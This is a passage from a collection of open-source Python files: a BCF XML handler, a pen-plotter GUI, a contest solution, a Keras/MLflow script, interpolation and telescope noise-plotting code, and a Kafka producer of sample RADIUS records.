os.path.join(self.filepath, topic.guid, viewpoint.viewpoint)\n if os.path.exists(filepath):\n os.remove(filepath)\n for bitmap in viewpoint.bitmaps:\n if not bitmap.reference:\n continue\n filepath = os.path.join(self.filepath, topic.guid, bitmap.reference)\n if os.path.exists(filepath):\n os.remove(filepath)\n del topic.viewpoints[guid]\n self.edit_topic(topic)\n\n def delete_file(self, topic, index):\n if not topic.header:\n return\n f = topic.header.files.pop(index)\n filepath = os.path.join(self.filepath, topic.guid, f.reference)\n if not f.is_external and os.path.exists(filepath):\n os.remove(filepath)\n self.edit_topic(topic)\n\n def delete_bim_snippet(self, topic):\n if not topic.bim_snippet:\n return\n if topic.bim_snippet.reference and not topic.bim_snippet.is_external:\n filepath = os.path.join(\n self.filepath, topic.guid, topic.bim_snippet.reference\n )\n if os.path.exists(filepath):\n os.remove(filepath)\n topic.bim_snippet = None\n self.edit_topic(topic)\n\n def delete_document_reference(self, topic, index):\n document_reference = topic.document_references[index]\n if (\n document_reference.referenced_document\n and not document_reference.is_external\n ):\n filepath = os.path.join(\n self.filepath, topic.guid, document_reference.referenced_document\n )\n if os.path.exists(filepath):\n os.remove(filepath)\n del topic.document_references[index]\n self.edit_topic(topic)\n\n def add_document_reference(self, topic, document_reference):\n if os.path.exists(document_reference.referenced_document):\n topic_filepath = os.path.join(self.filepath, topic.guid)\n filename = os.path.basename(document_reference.referenced_document)\n copyfile(\n document_reference.referenced_document,\n os.path.join(topic_filepath, filename),\n )\n document_reference.referenced_document = filename\n document_reference.is_external = False\n else:\n document_reference.is_external = True\n if not document_reference.guid:\n document_reference.guid = str(uuid.uuid4())\n topic.document_references.append(document_reference)\n self.edit_topic(topic)\n\n def add_bim_snippet(self, topic, bim_snippet):\n if topic.bim_snippet:\n self.delete_bim_snippet(topic)\n if os.path.exists(bim_snippet.reference):\n topic_filepath = os.path.join(self.filepath, topic.guid)\n filename = os.path.basename(bim_snippet.reference)\n copyfile(bim_snippet.reference, os.path.join(topic_filepath, filename))\n bim_snippet.reference = filename\n bim_snippet.is_external = False\n else:\n bim_snippet.is_external = True\n topic.bim_snippet = bim_snippet\n self.edit_topic(topic)\n\n def add_file(self, topic, header_file):\n if os.path.exists(header_file.reference):\n topic_filepath = os.path.join(self.filepath, topic.guid)\n header_file.filename = os.path.basename(header_file.reference)\n copyfile(\n header_file.reference,\n os.path.join(topic_filepath, header_file.filename),\n )\n header_file.reference = header_file.filename\n header_file.is_external = False\n header_file.date = datetime.utcnow().isoformat()\n if not topic.header:\n topic.header = bcf.data.Header()\n topic.header.files.append(header_file)\n self.edit_topic(topic)\n\n def get_comments(self, guid):\n comments = {}\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n if \"Comment\" not in data:\n return comments\n for item in data[\"Comment\"]:\n comment = bcf.data.Comment()\n mandatory_keys = {\n \"guid\": \"@Guid\",\n \"date\": \"Date\",\n \"author\": \"Author\",\n \"comment\": \"Comment\",\n }\n for key, value in mandatory_keys.items():\n setattr(comment, key, item[value])\n optional_keys = {\n \"modified_date\": \"ModifiedDate\",\n \"modified_author\": \"ModifiedAuthor\",\n }\n for key, value in optional_keys.items():\n if value in item:\n setattr(comment, key, item[value])\n if \"Viewpoint\" in item:\n viewpoint = bcf.data.Viewpoint()\n viewpoint.guid = item[\"Viewpoint\"][\"@Guid\"]\n comment.viewpoint = viewpoint\n comments[comment.guid] = comment\n self.topics[guid].comments = comments\n return comments\n\n def get_viewpoints(self, guid):\n viewpoints = {}\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n if \"Viewpoints\" not in data:\n return viewpoints\n for item in data[\"Viewpoints\"]:\n viewpoint = self.get_viewpoint(item, guid)\n viewpoints[viewpoint.guid] = viewpoint\n self.topics[guid].viewpoints = viewpoints\n return viewpoints\n\n def get_viewpoint(self, data, topic_guid):\n viewpoint = bcf.data.Viewpoint()\n viewpoint.guid = data[\"@Guid\"]\n optional_keys = {\n \"viewpoint\": \"Viewpoint\",\n \"snapshot\": \"Snapshot\",\n \"index\": \"Index\",\n }\n for key, value in optional_keys.items():\n if value in data:\n setattr(viewpoint, key, data[value])\n visinfo = self._read_xml(\n os.path.join(topic_guid, viewpoint.viewpoint), \"visinfo.xsd\"\n )\n viewpoint.components = self.get_viewpoint_components(visinfo)\n viewpoint.orthogonal_camera = self.get_viewpoint_orthogonal_camera(visinfo)\n viewpoint.perspective_camera = self.get_viewpoint_perspective_camera(visinfo)\n viewpoint.lines = self.get_viewpoint_lines(visinfo)\n viewpoint.clipping_planes = self.get_viewpoint_clipping_planes(visinfo)\n viewpoint.bitmaps = self.get_viewpoint_bitmaps(visinfo)\n return viewpoint\n\n def get_viewpoint_components(self, visinfo):\n if \"Components\" not in visinfo:\n return None\n components = bcf.data.Components()\n data = visinfo[\"Components\"]\n if \"ViewSetupHints\" in data:\n view_setup_hints = bcf.data.ViewSetupHints()\n optional_keys = {\n \"spaces_visible\": \"@SpacesVisible\",\n \"space_boundaries_visible\": \"@SpaceBoundariesVisible\",\n \"openings_visible\": \"@OpeningsVisible\",\n }\n for key, value in optional_keys.items():\n if value in data[\"ViewSetupHints\"]:\n setattr(view_setup_hints, key, data[\"ViewSetupHints\"][value])\n components.view_setup_hints = view_setup_hints\n if \"Selection\" in data and \"Component\" in data[\"Selection\"]:\n for item in data[\"Selection\"][\"Component\"]:\n components.selection.append(self.get_component(item))\n if \"Visibility\" in data:\n component_visibility = bcf.data.ComponentVisibility()\n if \"@DefaultVisibility\" in data[\"Visibility\"]:\n component_visibility.default_visibility = data[\"Visibility\"][\n \"@DefaultVisibility\"\n ]\n if (\n \"Exceptions\" in data[\"Visibility\"]\n and \"Component\" in data[\"Visibility\"][\"Exceptions\"]\n ):\n for item in data[\"Visibility\"][\"Exceptions\"][\"Component\"]:\n component_visibility.exceptions.append(self.get_component(item))\n components.visibility = component_visibility\n if \"Coloring\" in data and \"Color\" in data[\"Coloring\"]:\n for item in data[\"Coloring\"][\"Color\"]:\n color = bcf.data.Color()\n color.color = item[\"@Color\"]\n for item2 in item[\"Component\"]:\n color.components.append(self.get_component(item2))\n components.coloring.append(color)\n return components\n\n def get_viewpoint_orthogonal_camera(self, visinfo):\n if \"OrthogonalCamera\" not in visinfo:\n return None\n camera = bcf.data.OrthogonalCamera()\n data = visinfo[\"OrthogonalCamera\"]\n self.set_vector(camera.camera_view_point, data[\"CameraViewPoint\"])\n self.set_vector(camera.camera_direction, data[\"CameraDirection\"])\n self.set_vector(camera.camera_up_vector, data[\"CameraUpVector\"])\n camera.view_to_world_scale = data[\"ViewToWorldScale\"]\n return camera\n\n def get_viewpoint_perspective_camera(self, visinfo):\n if \"PerspectiveCamera\" not in visinfo:\n return None\n camera = bcf.data.PerspectiveCamera()\n data = visinfo[\"PerspectiveCamera\"]\n self.set_vector(camera.camera_view_point, data[\"CameraViewPoint\"])\n self.set_vector(camera.camera_direction, data[\"CameraDirection\"])\n self.set_vector(camera.camera_up_vector, data[\"CameraUpVector\"])\n camera.field_of_view = data[\"FieldOfView\"]\n return camera\n\n def get_viewpoint_lines(self, visinfo):\n if \"Lines\" not in visinfo:\n return []\n lines = []\n for item in visinfo[\"Lines\"][\"Line\"]:\n line = bcf.data.Line()\n self.set_vector(line.start_point, item[\"StartPoint\"])\n self.set_vector(line.end_point, item[\"EndPoint\"])\n lines.append(line)\n return lines\n\n def get_viewpoint_clipping_planes(self, visinfo):\n if \"ClippingPlanes\" not in visinfo:\n return []\n planes = []\n for item in visinfo[\"ClippingPlanes\"][\"ClippingPlane\"]:\n plane = bcf.data.ClippingPlane()\n self.set_vector(plane.location, item[\"Location\"])\n self.set_vector(plane.direction, item[\"Direction\"])\n planes.append(plane)\n return planes\n\n def get_viewpoint_bitmaps(self, visinfo):\n if \"Bitmap\" not in visinfo:\n return []\n bitmaps = []\n for item in visinfo[\"Bitmap\"]:\n bitmap = bcf.data.Bitmap()\n bitmap.reference = item[\"Reference\"]\n bitmap.bitmap_type = item[\"Bitmap\"].upper()\n self.set_vector(bitmap.location, item[\"Location\"])\n self.set_vector(bitmap.normal, item[\"Normal\"])\n self.set_vector(bitmap.up, item[\"Up\"])\n bitmap.height = item[\"Height\"]\n bitmaps.append(bitmap)\n return bitmaps\n\n def set_vector(self, to_obj, from_xml):\n to_obj.x = from_xml[\"X\"]\n to_obj.y = from_xml[\"Y\"]\n to_obj.z = from_xml[\"Z\"]\n\n def get_component(self, data):\n component = bcf.data.Component()\n optional_keys = {\n \"originating_system\": \"OriginatingSystem\",\n \"authoring_tool_id\": \"AuthoringToolId\",\n \"ifc_guid\": \"@IfcGuid\",\n }\n for key, value in optional_keys.items():\n if value in data:\n setattr(component, key, data[value])\n return component\n\n def close_project(self):\n shutil.rmtree(self.filepath)\n\n def _read_xml(self, filename, xsd):\n schema = XMLSchema(os.path.join(cwd, \"xsd\", xsd))\n filepath = os.path.join(self.filepath, filename)\n (data, errors) = schema.to_dict(filepath, validation=\"lax\")\n for error in errors:\n self.logger.error(error)\n return data\n\n def _create_element(self, parent, name, attributes={}, text=None):\n element = self.document.createElement(name)\n for key, value in attributes.items():\n if isinstance(value, bool):\n element.setAttribute(key, str(value).lower())\n elif value:\n element.setAttribute(key, value)\n if text is not None:\n text = self.document.createTextNode(str(text))\n element.appendChild(text)\n parent.appendChild(element)\n return element\n\n def __del__(self):\n self.close_project()\n","sub_path":"bcf/bcfxml.py","file_name":"bcfxml.py","file_ext":"py","file_size_in_byte":34083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648392174","text":"# -*- coding: cp1252 -*-\nimport sys\nfrom PyQt4 import QtCore, QtGui, uic\n\nfrom files import *\nimport os\nimport turtle\n\n\n\n\nclass Trace:\n \n def __init__(self, decalageX, decalageY, largeurPouces, numeroPort, fileName):\n self.decalageX = decalageX\n self.decalageY = decalageY\n self.largeurImage = largeurPouces\n self.numeroPort = numeroPort\n self.fileName = fileName\n self.POINTSPARPOUCE = 2540.0\n self.fichierDebut = \"C:r\\Python34\\Lib\\Plotter\\BEGIN.txt\"\n self.fichierFin = \"C:\\Python34\\Lib\\Plotter\\END.txt\"\n self.fichierSortie = \"resultat.plt\"\n\n def genererTuples(self):\n self.lines = []\n with open(self.fileName, 'r') as f:\n data = f.readlines()\n for line in data:\n line.replace(',', ' ')\n l = []\n line = line.strip(\"\\n\").strip(';')\n l.append(line[:2])\n rest = line[2:]\n division = rest.split(' ')\n if len(division) > 1:\n l.append(int(division[0]))\n l.append(int(division[1]))\n self.lines.append(l)\n \n \n i=0\n while i < len(self.lines):\n if len(self.lines[i]) != 3:\n self.lines.remove(self.lines[i])\n else:\n i+=1\n def definirMinMax(self):\n self.minX = 9999999\n self.maxX = -9999999\n self.minY = 999999999\n self.maxY = -9999999\n\n for line in self.lines:\n if line[1] < self.minX:\n self.minX = line[1]\n if line[1] > self.maxX:\n self.maxX = line[1]\n if line[2] < self.minY:\n self.minY = line[2]\n if line[2] > self.maxY:\n self.maxY = line[2]\n \n def definirRatio(self):\n largeur = self.maxX-self.minX\n self.ratio = self.largeurImage*self.POINTSPARPOUCE/largeur\n \n def rotater90(self):\n self.lines = [[line[0], line[2], -line[1]] for line in self.lines]\n \n def mettreAZero(self):\n self.definirMinMax()\n self.lines = [[line[0], line[1]-self.minX, line[2]-self.minY] for line in self.lines]\n\n def mettreAEchelle(self):\n self.lines = [[line[0], line[1]*self.ratio, line[2]*self.ratio] for line in self.lines]\n\n def decaler(self):\n self.lines = [[line[0], line[1]+self.decalageX*self.POINTSPARPOUCE, line[2]+self.decalageY*self.POINTSPARPOUCE] for line in self.lines]\n\n def previewTurtle(self):\n largeurMachine = 47.6\n hauteurMachine = 32.2\n winW = 1000\n winH = winW*hauteurMachine/40\n largeur = self.maxX-self.minX\n hauteur = self.maxY-self.minY\n ratio = winW/largeurMachine/self.POINTSPARPOUCE\n tempLines = [[line[0], line[2]*ratio, line[1]*ratio] for line in self.lines]\n turtle.setup(winW+40, winH+40, 0, 0)\n pen = turtle.Turtle()\n pen.up()\n pen.speed(0)\n pen.goto(-winW/2, -winH/2)\n pen.down()\n pen.goto(-winW/2, winH/2)\n pen.goto(winW/2,winH/2)\n pen.goto(winW/2,-winH/2)\n pen.goto(-winW/2, -winH/2)\n pen.up()\n pen.speed(3)\n pen.down()\n horsLimite = False\n for line in tempLines:\n if abs(line[1]) < winW and abs(line[2]) < winH:\n if horsLimite:\n pen.up()\n pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n horsLimite= False\n if line[0] == \"PU\":\n pen.up()\n pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n pen.down()\n pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n else:\n pen.down()\n pen.goto(-(line[1]-winW/2), line[2]-winH/2)\n else:\n pen.up()\n horsLimite = True\n print(line[1])\n pen.up()\n pen.speed(1)\n pen.goto(-(winW/2-20), winH/2-20)\n turtle.done()\n def convertirEnString(self):\n self.lines = [line[0] + str(int(line[1])) +',' + str(int(line[2])) +\";\\n\" for line in self.lines]\n \n def tracer(self):\n chaine = lireFichier(self.fichierFin)\n chaine += ''.join(self.lines)\n chaine += lireFichier(self.fichierFin)\n ecrireFichier(self.fichierSortie, chaine)\n out1 = \"mode \" + self.numeroPort + \" 19200, n, 8, 1, p\"\n out2 = 'copy /b ' + self.fichierSortie + ' ' +self.numeroPort\n #os.system(out1)\n #os.system(out2)\n print(out1)\n print(out2)\n os.remove(self.fichierSortie)\n \n def genererLines(self):\n self.genererTuples()\n self.definirMinMax()\n self.definirRatio()\n self.rotater90()\n self.mettreAZero()\n self.mettreAEchelle()\n self.decaler()\n \n def procedureApercu(self):\n self.genererLines()\n self.previewTurtle()\n\n def procedureTracer(self):\n self.genererLines()\n self.convertirEnString()\n self.tracer()\n\nform_class = uic.loadUiType(\"untitled.ui\")[0] # Load the UI\n \nclass MyWindowClass(QtGui.QMainWindow, form_class):\n def __init__(self, parent=None):\n QtGui.QMainWindow.__init__(self, parent)\n self.setupUi(self)\n self.btnParcourir.clicked.connect(self.btn_Parcourir_clicked) # Bind the event handlers\n self.btnApercu.clicked.connect(self.btn_Apercu_clicked)\n self.btnImprimer.clicked.connect(self.btn_Imprimer_clicked)\n self.btnQuitter.clicked.connect(self.btn_Quitter_clicked)\n\n def bonnesValeurs(self, decalageX, decalageY, largeurImage, numeroPort, nomFichier):\n if not decalageX.isnumeric():\n return False\n elif not decalageY.isnumeric():\n return False\n elif not largeurImage.isnumeric():\n return False\n elif numeroPort.upper() not in [\"COM\"+str(i) for i in range(1, 5)]:\n return False\n elif not nomFichier.endswith(\".plt\"):\n return False\n return True\n\n def btn_Parcourir_clicked(self):\n fname = QtGui.QFileDialog.getOpenFileName(self, 'Open file')\n self.labelFichier.setText(fname)\n \n def getTrace(self):\n if self.bonnesValeurs(self.entryEspaceX.text(), \\\n self.entryEspaceY.text(), \\\n self.entryLargeur.text(), \\\n self.entryPort.text(), \\\n self.labelFichier.text()):\n nomFichier = self.labelFichier.text()\n decalageX = float(self.entryEspaceX.text())\n decalageY = float(self.entryEspaceY.text())\n largeurImage = float(self.entryLargeur.text())\n numeroPort = self.entryPort.text()\n return Trace(decalageX, decalageY, largeurImage, numeroPort, nomFichier)\n return None\n \n def btn_Apercu_clicked(self):\n trace = self.getTrace()\n if trace != None:\n trace.procedureApercu()\n \n def btn_Imprimer_clicked(self):\n trace = self.getTrace()\n if trace != None:\n trace.procedureTracer()\n def btn_Quitter_clicked(self):\n self.close()\n \napp = QtGui.QApplication(sys.argv)\nmyWindow = MyWindowClass(None)\nmyWindow.show()\napp.exec_()\n","sub_path":"Python/Plotter/Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14707107","text":"def backtracking(idx, count, data):\n global cnt\n \n if idx + data[idx] >= data[0]:\n if count < cnt:\n cnt = count\n return\n \n if count > cnt:\n return\n \n start_battery = data[idx]\n for i in range(1, start_battery + 1):\n backtracking(idx + i, count + 1, data)\n\nif __name__ == \"__main__\":\n \n T = int(input())\n \n for tc in range(1, T + 1):\n cnt = 100000\n data_list = list(map(int, input().split()))\n \n backtracking(1, 0, data_list)\n \n print(\"#{} {}\".format(tc, cnt))","sub_path":"SW_Expert_Academy/문제풀이/Programming Advanced/5208.py","file_name":"5208.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"507517774","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport mlflow\nimport mlflow.keras\n#reading the data\ntrain_data=pd.read_csv('train.csv')\ntrain_data.head(5)\n#mlflow.set_tracking_uri(\"http://10.42.204.118:8000\")\n#exp_id=mlflow.create_experiment(\"sequential CNN\")\n\nX = train_data.iloc[:,:20].values\ny = train_data.iloc[:,20:21].values\n\nsc = StandardScaler()\nX = sc.fit_transform(X)\nohe = OneHotEncoder()\n#encoding classes into binary values\ny = ohe.fit_transform(y).toarray()\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size = 0.1)\nwith mlflow.start_run():\n #using autologging for logging parameters,metrics etc.\n mlflow.keras.autolog()\n #Building Neural network\n model = Sequential()\n model.add(Dense(16, input_dim=20, activation='relu'))\n model.add(Dense(12, activation='relu'))\n #model.add(Dense(8, activation='relu'))\n model.add(Dense(4, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n history = model.fit(X_train, y_train, epochs=100, batch_size=32)\n\n y_pred = model.predict(X_test)\n\n #Converting predictions to label\n pred = list()\n for i in range(len(y_pred)):\n pred.append(np.argmax(y_pred[i]))\n #Converting one hot encoded test label to label\n test = list()\n for i in range(len(y_test)):\n test.append(np.argmax(y_test[i]))\n a = accuracy_score(pred,test)\n print('Accuracy is:', a*100)\n","sub_path":"SequentialCNN.py","file_name":"SequentialCNN.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"129829378","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom spt3g import core, calibration\nimport os.path\nfrom datetime import datetime\nfrom spt3g.std_processing import obsid_to_g3time\nimport matplotlib\nimport matplotlib.dates as mdates\nfrom glob import glob\nfrom spt3g.mapspectra.apodmask import make_border_apodization\n\ncolor = {90:'C0', 150:'C1', 220:'C2'}\nfields = ['ra0hdec-44.75', 'ra0hdec-52.25', 'ra0hdec-59.75', 'ra0hdec-67.25']\ntstart = datetime(year=2019, month=1, day=1).timestamp()\ntstop = datetime(year=2019, month=9, day=10).timestamp()\nsunset = mdates.date2num(datetime(year=2019, month=3, day=21))\n\n\n# Let's calculate the duration of a field scan excluding turnarounds\n# (i.e the relevant length for noise estimates)\nscan_time = 0\nrawdata_path = '/spt/data/bolodata/downsampled/ra0hdec-44.75/84783979'\nd = list(core.G3File(os.path.join(rawdata_path, '0000.g3')))\nfor fname in glob(os.path.join(rawdata_path, '0*.g3')):\n print(fname)\n d = list(core.G3File(os.path.join(fname)))\n for fr in d:\n if fr.type == core.G3FrameType.Scan and \\\n 'Turnaround' not in fr:\n scan_time += (fr['DetectorSampleTimes'][-1].time -\n fr['DetectorSampleTimes'][0].time)\n\n# load the coadded maps to get the weights and area of the uniform coverage region\ncoadd_path = '/spt/user/weiquan/map_quality/hi_res_maps/yearly/2019/'\ncoadd_fnames = {band: {field: os.path.join(coadd_path, 'coadded_maps_from_{}_{}GHz.g3.gz'.format(field, band))\n for field in fields} for band in [90, 150, 220]}\ncoadd_TT_weights = {}\nweights_ratio = {}\narea_uniform_coverage = {}\nfor band in coadd_fnames.keys():\n if band not in coadd_TT_weights.keys():\n coadd_TT_weights[band] = {}\n weights_ratio[band] = {}\n area_uniform_coverage[band] = {}\n \n for field in fields:\n print('Loading: {}'.format(coadd_fnames[band][field]))\n coadd_data = list(core.G3File(coadd_fnames[band][field]))\n\n # get weights\n coadd_TT_weights[band][field] = coadd_data[2]['Wunpol'].TT + coadd_data[3]['Wunpol'].TT\n\n # calculate apodization mask\n apod_mask_uniform = make_border_apodization(coadd_TT_weights[band][field],\n apod_type='tophat',\n weight_threshold=0.9)\n\n weights_ratio[band][field] = np.sum(coadd_TT_weights[band][field] * apod_mask_uniform) / \\\n np.sum(coadd_TT_weights[band][field])\n area_uniform_coverage[band][field] = np.sum(apod_mask_uniform) * (apod_mask_uniform.res)**2\n\n# load the analysis summary files to get the noise levels\nnoise_summary_path = '/spt/user/weiquan/map_quality/hi_res_maps/monthly/all_months'\nnoise_summary_fnames = {band: os.path.join(noise_summary_path, 'all_analysis_results_{}GHz.g3'.format(band))\n for band in [90, 150, 220]}\nobsids_nets = {}\nnoises = {}\nnets = {}\nfor band in noise_summary_fnames.keys():\n if band not in obsids_nets.keys():\n obsids_nets[band] = {}\n noises[band] = {}\n nets[band] = {}\n \n noise_summary = list(core.G3File(noise_summary_fnames[band]))\n \n for field in fields:\n\n obsids_nets[band][field] = np.array([k for k in noise_summary[0][\"NoiseLevelsFromIndividualTMaps\"]\\\n [field].keys()])\n noises[band][field] = np.array([noise_summary[0][\"NoiseLevelsFromIndividualTMaps\"][field][k] \\\n for k in noise_summary[0][\"NoiseLevelsFromIndividualTMaps\"][field].keys()])\n nets[band][field] = noises[band][field] / np.sqrt(area_uniform_coverage[band][field]) * \\\n np.sqrt(scan_time * weights_ratio[band][field])\n\n# find all observations with obsids that fall between start and stop\nobsids_all = []\ndirnames_all = []\nfor source in ['ra0hdec-44.75', 'ra0hdec-52.25',\n 'ra0hdec-59.75', 'ra0hdec-67.25']:\n dirnames = np.array(glob('/spt/data/bolodata/downsampled/{}/*'.format(source)))\n obsids = np.array([int(dirname.split('/')[-1]) for dirname in dirnames])\n times = np.array([obsid_to_g3time(obsid).time/core.G3Units.second\n for obsid in obsids])\n obsids_all = np.append(obsids_all, obsids[(times < tstop) & (times > tstart)])\n dirnames_all = np.append(dirnames_all, dirnames[(times < tstop) & (times > tstart)])\n\n# find start and stop time of each observation\nobs_tstart = []\nobs_tstop = []\nfor dirname in dirnames_all:\n print(dirname)\n f = core.G3File('{}/0000.g3'.format(dirname))\n fr = f.next()\n try:\n obs_tstart.append(fr[\"ObservationStart\"].time/core.G3Units.second)\n obs_tstop.append(fr[\"ObservationStop\"].time/core.G3Units.second)\n except KeyError:\n pass\nobs_tstart = np.sort(np.array(obs_tstart))\nobs_tstop = np.sort(np.array(obs_tstop))\ntlive = obs_tstop - obs_tstart\nepoch_tstart = mdates.epoch2num(obs_tstart)\n\n# set up months boundaries for x ticks\nmonth_times = np.array([mdates.date2num(datetime(year=2019, month=jmonth, day=1)) for jmonth in np.arange(1,10)])\nmonth_times = np.append(month_times, mdates.date2num(datetime(year=2019, month=9, day=10)))\n\n# set up bin edges for binning\nbin_times = np.linspace(mdates.epoch2num(tstart),\n mdates.epoch2num(tstop), 30) \nmonth_lengths = bin_times[1:] - bin_times[:-1]\njbins = np.digitize(mdates.epoch2num(obs_tstart), bin_times) - 1\n\n\nmatplotlib.rcParams.update({'font.size': 13})\n\nfig = plt.figure(figsize=(12,7))\n\nax_top = plt.subplot(3,1,1)\nplt.ylabel('livetime fraction\\non CMB')\n_ = plt.hist(mdates.epoch2num(obs_tstart),\n weights=tlive / (3600*24) / month_lengths[jbins],\n bins=bin_times,\n color='C1', alpha=0.3)\n_ = plt.hist(mdates.epoch2num(obs_tstart),\n weights=tlive / (3600*24) / month_lengths[jbins],\n bins=bin_times,\n color='C1', histtype='step')\nplt.ylim([0,0.8])\nplt.grid()\n\n\nplt.subplot(3,1,2,sharex=ax_top)\nfor band in nets.keys():\n for field in fields:\n times_nets = np.array([mdates.epoch2num(obsid_to_g3time(ob).time/core.G3Units.sec) \\\n for ob in obsids_nets[band][field]])\n net_threshold = 6*core.G3Units.microkelvin * np.sqrt(core.G3Units.sec)\n plt.plot(times_nets[nets[band][field] > net_threshold],\n nets[band][field][nets[band][field] > net_threshold] / \\\n (core.G3Units.microkelvin * np.sqrt(core.G3Units.sec)), '.',\n markersize=2, color=color[band])\nplt.ylim([0, 39.7])\nplt.xlabel('observation ID')\nplt.ylabel('NET [$\\mu$K$\\sqrt{s}$]')\nplt.tight_layout()\nplt.grid()\n\n\nband_labels = {90:'95 GHz', 150:'150 GHz', 220:'220 GHz'}\nplt.subplot(3,1,3,sharex=ax_top)\nfor band in [90, 150, 220]:\n noise_dict = {}\n obsids_dict = {}\n for field in fields:\n d = list(core.G3File('/home/nadolski/3G_INST_PAPER_FIG_GEN/data/'\n 'some_analysis_results_{}GHz.g3'.format(band)))[0]\n noise = np.array([d[\"NoiseLevelsFromCoaddedTMaps\"][field][obsid] \\\n for obsid in d[\"NoiseLevelsFromCoaddedTMaps\"][field].keys()])\n noise = noise / (core.G3Units.microkelvin * core.G3Units.arcmin)\n obsids = [int(obsid) for obsid in d[\"NoiseLevelsFromCoaddedTMaps\"][field].keys()]\n noise_dict[field] = noise\n obsids_dict[field] = obsids\n \n max_min_obsid = np.max([np.min(obsids_dict[field]) for field in obsids_dict])\n min_max_obsid = np.min([np.max(obsids_dict[field]) for field in obsids_dict])\n obsids_interp = np.linspace(max_min_obsid, min_max_obsid, 500)\n times_interp = np.array([mdates.epoch2num(obsid_to_g3time(ob).time/core.G3Units.sec) for ob in obsids_interp])\n noise_interp = np.sum(np.vstack([np.interp(obsids_interp, obsids_dict[field], noise_dict[field])\n for field in fields]), axis=0) / 4\n \n plt.semilogy(times_interp, noise_interp, label=band_labels[band])\n\n\nplt.legend()\nplt.grid()\nplt.ylabel('cumulative map\\ndepth [$\\mu$K arcmin]')\n\nplt.tight_layout()\nfig.subplots_adjust(hspace=0)\n\nplt.savefig('livetime_noise_summary.pdf')\n","sub_path":"20190329_gainmatching/livetime_noise.py","file_name":"livetime_noise.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59265397","text":"# ===============================================================================\n# NAME: ImplWriterBase.py\n#\n# DESCRIPTION: A base class for Impl writers\n#\n# AUTHOR: Jordan Ishii\n# EMAIL: jordan.ishii@jpl.nasa.gov\n# DATE CREATED : August 8, 2019\n#\n# Copyright 2015, California Institute of Technology.\n# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.\n# ===============================================================================\n\nfrom fprime_ac.generators.writers import ComponentWriterBase\n\n\nclass ImplWriterBase(ComponentWriterBase.ComponentWriterBase):\n \"\"\"\n A base class for Impl writers\n \"\"\"\n\n def initImpl(self, obj, c):\n self.init(obj, c)\n c.component_base = c.name() + \"ComponentBase\"\n c.impl = c.name() + \"Impl\"\n","sub_path":"Autocoders/Python/src/fprime_ac/generators/writers/ImplWriterBase.py","file_name":"ImplWriterBase.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392479636","text":"#!/usr/bin/env python3\n\n##############################\n#Author: Albert Szadziński #\n#Date:19.12.16 #\n##############################\n\n\"\"\"\nPolynomial & trigonometric interpolation\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\ndef draw(*args):\n plt.plot(*args)\n plt.grid(True)\n #plt.xlim(args[0][0],args[0][-1])\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\ndef interpol_poly(x,y,X):\n hp = 0.0\n for i in range(len(y)):\n h = 1\n for j in range(len(y)):\n if j != i:\n h *= (X-x[j])/(x[i]-x[j])\n hp += y[i]*h\n return hp\n\n\n\ndef interpol_tryg(x,y,X):\n from math import sin\n k = len(y)\n var1 = 0\n for i in range(k):\n var2 = 1\n for j in range(k):\n if j != i:\n var2 *= sin(0.5*(X-x[j]))/sin(0.5*(x[i]-x[j]))\n var1 += y[i]*var2\n return var1\n\n\nif __name__=='__main__':\n from sys import argv\n from random import uniform\n a = eval(argv[2])\n b = eval(argv[3])\n x, y = [], []\n p = 0\n for i in range(a[0],(a[-1]+1)*10):\n x.append(p)\n p+=0.1\n if argv[1]=='pol': \n y=[interpol_poly(a,b,i) for i in x]\n elif argv[1]=='tryg':\n y=[interpol_tryg(a,b,i) for i in x]\n\t\n draw(a,b,'o',x,y)\n","sub_path":"interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308498677","text":"#!/usr/bin/env python\nimport json\n\nfrom kafka import KafkaProducer\n\nPRODUCER = KafkaProducer(\n bootstrap_servers='localhost:9092',\n value_serializer=lambda v: json.dumps(v).encode('utf-8')\n)\n\n\nACCT = {\n 'NAS-IP-Address': '172.16.244.54',\n 'Acct-Status-Type': 'Alive',\n 'Acct-Input-Packets': 107,\n 'NAS-Identifier': 'TEH-Hekmatshoar',\n 'Acct-Session-Id': '81658ddf',\n 'NAS-Port-Type': 'Ethernet',\n 'Acct-Input-Octets': 8673,\n 'Acct-Session-Time': 240,\n 'Service-Type': 'Framed-User',\n 'Acct-Output-Gigawords': 0,\n 'Acct-Output-Octets': 36001,\n 'Acct-Delay-Time': 0,\n 'Framed-Protocol': 'PPP',\n 'Acct-Authentic': 'RADIUS',\n 'Acct-Input-Gigawords': 0,\n 'Calling-Station-Id': '90:F6:52:B0:91:C5',\n 'NAS-Port': 15880901,\n 'Event-Timestamp': 1480408761,\n 'User-Name': u'2177896179',\n 